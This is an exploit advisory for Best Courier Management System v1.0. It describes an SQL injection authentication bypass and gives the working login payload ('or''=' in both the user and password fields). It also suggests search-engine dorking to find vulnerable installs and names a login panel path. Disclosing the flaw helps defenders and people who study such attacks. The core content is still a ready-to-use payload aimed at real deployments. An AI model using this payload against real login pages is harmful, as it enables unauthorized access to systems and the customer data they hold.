Authored by indoushka

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

=============================================================================================================================================
| # Title : Best Courier Management System v1.0 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] use payload : user : 'or''='@gmail.com & pass = 'or''='

[+] Panel : http://127.0.0.1/gaatitrack/login.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================